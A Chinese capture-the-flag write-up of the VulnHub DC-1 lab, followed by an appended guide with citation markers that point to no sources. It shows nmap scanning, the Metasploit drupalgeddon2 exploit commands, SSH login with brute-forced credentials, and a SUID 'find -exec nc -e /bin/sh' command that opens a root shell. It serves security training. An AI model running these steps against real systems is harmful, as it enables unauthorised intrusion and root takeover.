VulnHub之dc1靶场(3)

本文分享了如何通过Nmap扫描、弱口令爆破、漏洞复现,利用Drupal远程代码执行漏洞,最终实现SUID提权并获取反弹shell的过程,涉及技术包括Apache、PHP、Drupal和Metasploit。
靶场信息:

地址:https://www.vulnhub.com/entry/dc-1-1,292/
难度:简单
目标:有五个标志,但是最终目标是在根目录的主目录中找到并读取该标志
运行:vm work

信息收集

nmap直接扫描网段存活主机
在这里插入图片描述
扫描常见端口

nmap  10.7.10.29  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-19 04:14 EST
Nmap scan report for 10.7.10.29
Host is up (0.0021s latency).
Not shown: 995 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
111/tcp open  rpcbind

Nmap done: 1 IP address (1 host up) scanned in 17.50 seconds

爆破弱口令,访问网页,扫描目录
在这里插入图片描述
收集指纹:

中间件:apache 2.2.22
语言:php 5.4.45
cms:drupal 7

漏洞复现

信息泄露

http://10.7.10.29/robots.txt在这里插入图片描述

远程代码执行漏洞

search Drupal
use exploit/unix/webapp/drupal_drupalgeddon2
show options
set rhosts 10.7.10.29
run

我msf老是返回这个,呜呜呜
在这里插入图片描述

弱口令

回去查看爆破内容
在这里插入图片描述
直接登陆ssh在这里插入图片描述
登陆成功,但是/root目录没有权限
在这里插入图片描述

suid提权

尝试找到具有root权限的suid
在这里插入图片描述
发现为root可以利用
在这里插入图片描述
执行成功
在这里插入图片描述
首先执行find flag4.txt -exec nc -lvp 9999 -e /bin/sh \;
反弹shell到我的linux上
在这里插入图片描述
反弹成功,跳到root目录下在这里插入图片描述
参考文章:
https://blog.youkuaiyun.com/adminuil/article/details/101269264
https://blog.youkuaiyun.com/weixin_40860777/article/details/105118966

suid提权:https://blog.youkuaiyun.com/qq_36119192/article/details/84872644

### VulnHub DC-1 渗透测试实验环境下载与指导 #### 实验环境概述 VulnHub上的DC-1是一个面向初学者的虚拟机镜像,旨在提供一个安全的学习环境来练习基本的渗透测试技能。该靶机运行Ubuntu操作系统,并部署了一个存在多个漏洞的应用程序——Drupal 7网站。 #### 下载指南 为了获取DC-1的实验环境,访问[VulnHub官方网站](https://www.vulnhub.com/)并搜索“DC-1”。按照页面指示下载对应的OVA文件,此文件适用于VirtualBox或VMware等虚拟化软件安装使用[^1]。 #### 测试前准备 确保攻击者使用的Kali Linux系统已经正确配置网络设置以便能够与目标机器通信。通常情况下,建议采用NAT模式或者桥接模式连接至同一局域网内[^2]。 #### 初始信息收集 启动虚拟机之后,可以先执行简单的主机发现操作,比如使用`ping`命令确认目标存活状态;接着运用工具如`nmap`进行全面端口和服务扫描: ```bash nmap -A 192.168.189.172 ``` 上述命令将会返回有关开放端口以及可能存在的服务版本的信息,这对于后续攻击路径的选择至关重要[^3]。 #### Web应用分析 根据前期侦察得知,Web服务器托管着一个Drupal CMS实例。考虑到这是较旧版本(Drupal 7),可能存在已知的安全缺陷。此时可查阅CVE数据库或其他资源了解针对此类系统的具体攻击向量[^4]。 #### 获取初始Shell 一旦识别到可用漏洞,则可通过Metasploit框架快速建立远程会话。例如,如果选择了某个适合于Drupal 7.x的exploit模块,那么只需指定RHOST参数指向受害者的IP地址即可尝试入侵[^5]。 #### 提升权限 成功植入后门并不意味着结束战斗。接下来的任务是要设法提升当前用户的权限级别直至root账户。这一步骤往往涉及寻找具有SUID位设定的二进制文件并通过它们实施本地提权技巧。例如,利用`find`命令定位潜在的目标对象: ```bash find / -perm -u=s -type f 2>/dev/null ``` 以上代码片段用于遍历整个文件系统树结构,过滤出那些设置了SETUID标志且属于常规类型的节点[^6]。 #### 寻找Flag文件 在整个过程中,参与者需留意任何关于隐藏标记(flags)位置的线索提示。这些flag通常被放置在特定目录下作为完成各个阶段挑战任务的关键证明材料。对于本案例而言,至少存在五个不同级别的flag等待探索者去发掘[^7]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值